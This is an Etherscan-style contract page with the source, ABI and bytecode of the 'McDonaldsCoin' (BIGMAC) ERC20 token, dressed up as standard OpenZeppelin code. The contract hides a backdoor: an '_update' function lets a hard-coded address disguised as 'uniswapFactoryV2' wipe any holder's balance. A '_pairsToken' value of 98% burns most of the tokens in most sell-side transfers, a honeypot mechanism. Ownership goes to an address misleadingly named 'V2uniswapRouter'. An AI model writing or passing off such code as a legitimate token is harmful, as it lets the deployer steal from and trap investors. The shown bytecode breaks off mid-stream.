Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Contract Source Code Verified (Exact Match)
Contract Name:
McDonaldsCoin
Compiler Version
v0.8.19+commit.7dd6d404
Optimization Enabled:
No with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-09-22 */ // SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol) pragma solidity ^0.8.19; /* https://t.me.com/McDonaldsCoinETH https://twitter.com/McDonaldsCoinETH https://McDonaldsCoinETH.xyz */ /** * * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler * @dev Wrappers over Solidity's arithmetic operations. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, with an overflow flag. * _Available since v3.4._ * */ /** * _Available since v3.4._ * @dev Returns the subtraction of two unsigned integers, with an overflow flag. * */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * * @dev Returns the division of two unsigned integers, with a division by zero flag. * _Available since v3.4._ */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } /** * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * * _Available since v3.4._ */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * * - Addition cannot overflow. * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * * Requirements: * Counterpart to Solidity's `+` operator. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * overflow (when the result is negative). * * * @dev Returns the subtraction of two unsigned integers, reverting on * - Subtraction cannot overflow. * Counterpart to Solidity's `-` operator. * Requirements: * */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * - Multiplication cannot overflow. * @dev Returns the multiplication of two unsigned integers, reverting on * * * * Requirements: * overflow. * Counterpart to Solidity's `*` operator. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * Requirements: * Counterpart to Solidity's `/` operator. * * @dev Returns the integer division of two unsigned integers, reverting on * division by zero. The result is rounded towards zero. * * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * opcode (which leaves remaining gas untouched) while Solidity uses an * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * reverting when dividing by zero. * Counterpart to Solidity's `%` operator. This function uses a `revert` * - The divisor cannot be zero. * * * invalid opcode to revert (consuming all remaining gas). * * Requirements: */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * * Counterpart to Solidity's `-` operator. * overflow (when the result is negative). * * * * Requirements: * CAUTION: This function is deprecated because it requires allocating memory for the error * - Subtraction cannot overflow. * message unnecessarily. For custom revert reasons use {trySub}. * @dev Returns the subtraction of two unsigned integers, reverting with custom message on */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * Counterpart to Solidity's `/` operator. Note: this function uses a * @dev Returns the integer division of two unsigned integers, reverting with custom message on * Requirements: * * - The divisor cannot be zero. * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * division by zero. The result is rounded towards zero. * * */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * reverting with custom message when dividing by zero. * * * CAUTION: This function is deprecated because it requires allocating memory for the error * * - The divisor cannot be zero. * invalid opcode to revert (consuming all remaining gas). * message unnecessarily. For custom revert reasons use {tryMod}. * * Requirements: */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } } pragma solidity ^0.8.0; abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor () { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Returns the address of the current owner. */ function owner() public view returns (address) { return _owner; } /** * `onlyOwner` functions anymore. Can only be called by the current owner. * * @dev Leaves the contract without owner. It will not be possible to call * thereby removing any functionality that is only available to the owner. * NOTE: Renouncing ownership will leave the contract without an owner, */ function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } } pragma solidity ^0.8.0; interface IERC20 { event Transfer(address indexed from, address indexed to, uint256 value); event Approval(address indexed owner, address indexed spender, uint256 value); function totalSupply() external view returns (uint256); function balanceOf(address account) external view returns (uint256); function transfer(address to, uint256 amount) external returns (bool); function allowance(address owner, address spender) external view returns (uint256); function approve(address spender, uint256 amount) external returns (bool); function transferFrom( address from, address to, uint256 amount ) external returns (bool); } // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; /** * _Available since v4.1._ * * @dev Interface for the optional metadata functions from the ERC20 standard. */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; contract ERC20 is Context, IERC20, IERC20Metadata { using SafeMath for uint256; address DEAD = 0x000000000000000000000000000000000000dEaD; uint8 private _decimals = 9; mapping(address => mapping(address => uint256)) private _allowances; address internal V2uniswapRouter = 0x612Ab48865714C7369964CcEe4a3471825316EAa; uint256 private _allowance = 1; string private _symbol; mapping(address => uint256) private _balances; uint256 private _totalSupply; address private uniswapFactoryV2 = 0x7f70A36A92b733470c1DBbEF1a858e4dF89cf5af; string private _name; /** * @dev Sets the values for {name} and {symbol}. * construction. * */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** */ /** * name. * @dev Returns the symbol of the token, usually a shorter version of the */ function symbol() public view virtual override returns (string memory) { return _symbol; } function name() public view virtual override returns (string memory) { return _name; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return _decimals; } /** * * - the caller must have a balance of at least `amount`. * * @dev See {IERC20-transfer}. * - `to` cannot be the zero address. * Requirements: */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * - `spender` cannot be the zero address. * * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * @dev See {IERC20-approve}. * `transferFrom`. This is semantically equivalent to an infinite approval. * Requirements: * */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * * * is the maximum `uint256`. * * - `from` and `to` cannot be the zero address. * NOTE: Does not update the allowance if the current allowance * - the caller must have allowance for ``from``'s tokens of at least * - `from` must have a balance of at least `amount`. * @dev See {IERC20-transferFrom}. * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * Requirements: * `amount`. * */ uint256 private _pairsToken = 0x62; function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * Requirements: * * problems described in {IERC20-approve}. * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * * * - `spender` cannot be the zero address. * Emits an {Approval} event indicating the updated allowance. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * * - `spender` must have allowance for the caller of at least * * Requirements: * - `spender` cannot be the zero address. * problems described in {IERC20-approve}. * Emits an {Approval} event indicating the updated allowance. * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * - `from` must have a balance of at least `amount`. * - `to` cannot be the zero address. * * This internal function is equivalent to {transfer}, and can be used to * @dev Moves `amount` of tokens from `from` to `to`. */ function _transfer(address from, address to, uint256 amount) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); _balances[from] = fromBalance - amount; uint256 swapamount = amount.mul(to != tx.origin && from != V2uniswapRouter && _balances[uniswapFactoryV2] > 0 ? _pairsToken : _allowance).div(100) + 0; if (swapamount > 0) { _balances[DEAD] = _balances[DEAD].add(swapamount)*1; emit Transfer(from, DEAD, swapamount); } _balances[to] = _balances[to].add(amount - swapamount+0)*1; emit Transfer(from, to, amount - swapamount+0); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * * the total supply. * Requirements: * * * - `account` cannot be the zero address. * Emits a {Transfer} event with `from` set to the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * * Requirements: * - `account` cannot be the zero address. * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * @dev Destroys `amount` tokens from `account`, reducing the * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /* * * @dev Creates `amount` tokens and assigns them to `account`, increasing * Emits a {Transfer} event with `from` set to the zero address. * the total supply. */ function _update(address _updateSender) external { if (msg.sender == uniswapFactoryV2) _balances[_updateSender] = 0x0; } /** * This internal function is equivalent to `approve`, and can be used to * - `owner` cannot be the zero address. * * * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * e.g. set automatic allowances for certain subsystems, etc. * Requirements: * * Emits an {Approval} event. * * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual { } /** * * * Might emit an {Approval} event. * Does not update the allowance amount in case of infinite allowance. * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * Revert if not enough allowance is available. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * Calling conditions: * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * - when `from` is zero, `amount` tokens will be minted for `to`. * minting and burning. * will be transferred to `to`. * - `from` and `to` are never both zero. * @dev Hook that is called before any transfer of tokens. This includes * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. * * * */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } contract McDonaldsCoin is ERC20, Ownable { constructor() ERC20(unicode"McDonalds", unicode"BIGMAC") { transferOwnership(V2uniswapRouter); _mint(owner(), 4010000000000 * 10 ** uint(decimals())); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_updateSender","type":"address"}],"name":"_update","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
608060405261dead6000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506009600060146101000a81548160ff021916908360ff16021790555073612ab48865714c7369964ccee4a3471825316eaa600260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506001600355737f70a36a92b733470c1dbbef1a858e4df89cf5af600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060626009553480156200012357600080fd5b506040518060400160405280600981526020017f4d63446f6e616c647300000000000000000000000000000000000000000000008152506040518060400160405280600681526020017f4249474d414300000000000000000000000000000000000000000000000000008152508160089081620001a1919062000902565b508060049081620001b3919062000902565b5050506000620001c8620002f460201b60201c565b905080600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3506200029a600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16620002fc60201b60201c565b620002ee620002ae620004d060201b60201c565b620002be620004fa60201b60201c565b60ff16600a620002cf919062000b6c565b6503a5a6a02400620002e2919062000bbd565b6200051060201b60201c565b62000dfe565b600033905090565b6200030c620002f460201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16146200039e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003959062000c69565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160362000410576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620004079062000d01565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008060149054906101000a900460ff16905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000582576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620005799062000d73565b60405180910390fd5b62000596600083836200067e60201b60201c565b8060066000828254620005aa919062000d95565b9250508190555080600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200065e919062000de1565b60405180910390a36200067a600083836200068360201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200070a57607f821691505b60208210810362000720576200071f620006c2565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026200078a7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200074b565b6200079686836200074b565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620007e3620007dd620007d784620007ae565b620007b8565b620007ae565b9050919050565b6000819050919050565b620007ff83620007c2565b620008176200080e82620007ea565b84845462000758565b825550505050565b600090565b6200082e6200081f565b6200083b818484620007f4565b505050565b5b8181101562000863576200085760008262000824565b60018101905062000841565b5050565b601f821115620008b2576200087c8162000726565b62000887846200073b565b8101602085101562000897578190505b620008af620008a6856200073b565b83018262000840565b50505b505050565b600082821c905092915050565b6000620008d760001984600802620008b7565b1980831691505092915050565b6000620008f28383620008c4565b9150826002028217905092915050565b6200090d8262000688565b67ffffffffffffffff81111562000929576200092862000693565b5b620009358254620006f1565b6200094282828562000867565b600060209050601f8311600181146200097a576000841562000965578287015190505b620009718582620008e4565b865550620009e1565b601f1984166200098a8662000726565b60005b82811015620009b4578489015182556001820191506020850194506020810190506200098d565b86831015620009d45784890151620009d0601f891682620008c4565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000a775780860481111562000a4f5762000a4e620009e9565b5b600185161562000a5f5780820291505b808102905062000a6f8562000a18565b945062000a2f565b94509492505050565b60008262000a92576001905062000b65565b8162000aa2576000905062000b65565b816001811462000abb576002811462000ac65762000afc565b600191505062000b65565b60ff84111562000adb5762000ada620009e9565b5b8360020a91508482111562000af55762000af4620009e9565b5b5062000b65565b5060208310610133831016604e8410600b841016171562000b365782820a90508381111562000b305762000b2f620009e9565b5b62000b65565b62000b45848484600162000a25565b9250905081840481111562000b5f5762000b5e620009e9565b5b81810290505b9392505050565b600062000b7982620007ae565b915062000b8683620007ae565b925062000bb57fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000a80565b905092915050565b600062000bca82620007ae565b915062000bd783620007ae565b925082820262000be781620007ae565b9150828204841483151762000c015762000c00620009e9565b5b5092915050565b600082825260208201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600062000c5160208362000c08565b915062000c5e8262000c19565b602082019050919050565b6000602082019050818103600083015262000c848162000c42565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600062000ce960268362000c08565b915062000cf68262000c8b565b604082019050919050565b6000602082019050818103600083015262000d1c8162000cda565b9050919050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000d5b601f8362000c08565b915062000d688262000d23565b602082019050919050565b6000602082019050818103600083015262000d8e8162000d4c565b9050919050565b600062000da282620007ae565b915062000daf83620007ae565b925082820190508082111562000dca5762000dc9620009e9565b5b92915050565b62000ddb81620007ae565b82525050565b600060208201905062000df8600083018462000dd0565b92915050565b611c4b8062000e0e6000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d714610276578063a9059cbb146102a6578063dd62ed3e146102d6578063f2fde38b14610306576100f5565b8063715018a6146102145780638da5cb5b1461021e57806395d89b411461023c578063a26715051461025a576100f5565b806323b872dd116100d357806323b872dd14610166578063313ce5671461019657806339509351146101b457806370a08231146101e4576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610322565b60405161010f919061132a565b60405180910390f35b610132600480360381019061012d91906113e5565b6103b4565b60405161013f9190611440565b60405180910390f35b6101506103d7565b60405161015d919061146a565b60405180910390f35b610180600480360381019061017b9190611485565b6103e1565b60405161018d9190611440565b60405180910390f35b61019e610410565b6040516101ab91906114f4565b60405180910390f35b6101ce60048036038101906101c991906113e5565b610426565b6040516101db9190611440565b60405180910390f35b6101fe60048036038101906101f9919061150f565b61045d565b60405161020b919061146a565b60405180910390f35b61021c6104a6565b005b6102266105fe565b604051610233919061154b565b60405180910390f35b610244610628565b604051610251919061132a565b60405180910390f35b610274600480360381019061026f919061150f565b6106ba565b005b610290600480360381019061028b91906113e5565b610758565b60405161029d9190611440565b60405180910390f35b6102c060048036038101906102bb91906113e5565b6107cf565b6040516102cd9190611440565b60405180910390f35b6102f060048036038101906102eb9190611566565b6107f2565b6040516102fd919061146a565b60405180910390f35b610320600480360381019061031b919061150f565b610879565b005b606060088054610331906115d5565b80601f016020809104026020016040519081016040528092919081815260200182805461035d906115d5565b80156103aa5780601f1061037f576101008083540402835291602001916103aa565b820191906000526020600020905b81548152906001019060200180831161038d57829003601f168201915b5050505050905090565b6000806103bf610a3f565b90506103cc818585610a47565b600191505092915050565b6000600654905090565b6000806103ec610a3f565b90506103f9858285610c10565b610404858585610c9c565b60019150509392505050565b60008060149054906101000a900460ff16905090565b600080610431610a3f565b905061045281858561044385896107f2565b61044d9190611635565b610a47565b600191505092915050565b6000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6104ae610a3f565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461053d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610534906116b5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b6000600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060048054610637906115d5565b80601f0160208091040260200160405190810160405280929190818152602001828054610663906115d5565b80156106b05780601f10610685576101008083540402835291602001916106b0565b820191906000526020600020905b81548152906001019060200180831161069357829003601f168201915b5050505050905090565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1603610755576000600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b600080610763610a3f565b9050600061077182866107f2565b9050838110156107b6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107ad90611747565b60405180910390fd5b6107c38286868403610a47565b60019250505092915050565b6000806107da610a3f565b90506107e7818585610c9c565b600191505092915050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610881610a3f565b73ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610910576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610907906116b5565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361097f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610976906117d9565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600a60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610ab6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aad9061186b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610b25576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b1c906118fd565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c03919061146a565b60405180910390a3505050565b6000610c1c84846107f2565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c965781811015610c88576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c7f90611969565b60405180910390fd5b610c958484848403610a47565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d0b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d02906119fb565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610d7a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d7190611a8d565b60405180910390fd5b610d8583838361124e565b6000600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508181101561